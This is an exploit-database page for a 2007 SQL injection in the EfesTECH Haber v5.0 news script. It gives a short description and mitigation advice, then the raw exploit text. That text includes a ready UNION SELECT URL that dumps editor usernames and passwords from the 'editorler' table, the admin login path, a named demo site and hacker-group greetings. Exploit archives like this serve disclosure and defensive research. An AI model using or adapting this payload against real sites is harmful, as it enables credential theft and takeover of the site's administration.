header-logo
Suggest Exploit
vendor:
EfesTECH Haber
by:
CyberGhost
5.5
CVSS
MEDIUM
Remote SQL Injection
89
CWE
Product Name: EfesTECH Haber
Affected Version From: 5
Affected Version To: 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

EfesTECH Haber v5,0 Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection by manipulating the 'id' parameter in the URL. By using a UNION SELECT statement, the attacker can retrieve sensitive information such as usernames and passwords from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://www.haberguvercini.com
#Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir

#Vuln.

#Username - Password:/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler
#Admin Login : /editor
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR

And All TURKISH HACKERS !

# milw0rm.com [2007-05-14]